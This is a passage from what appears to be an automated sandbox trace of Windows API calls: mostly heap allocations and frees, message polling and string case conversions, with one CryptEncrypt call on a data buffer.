lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0262.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.963] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.964] CharLowerBuffW (in: lpsz="byte[99048]", cchLength=0xb | out: lpsz="byte[99048]") returned 0xb [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.964] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0262.966] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.966] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.966] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.967] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34ca540*, pdwDataLen=0x8bef68*=0x182e1, dwBufLen=0x182e8 | out: pbData=0x34ca540*, pdwDataLen=0x8bef68*=0x182e8) returned 1 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0262.969] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.971] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.971] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.971] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.971] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.971] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.971] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.972] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.972] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.972] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.972] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.972] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.972] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.972] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.973] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.973] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.973] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.973] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.973] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.973] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.973] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.978] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.978] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.978] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 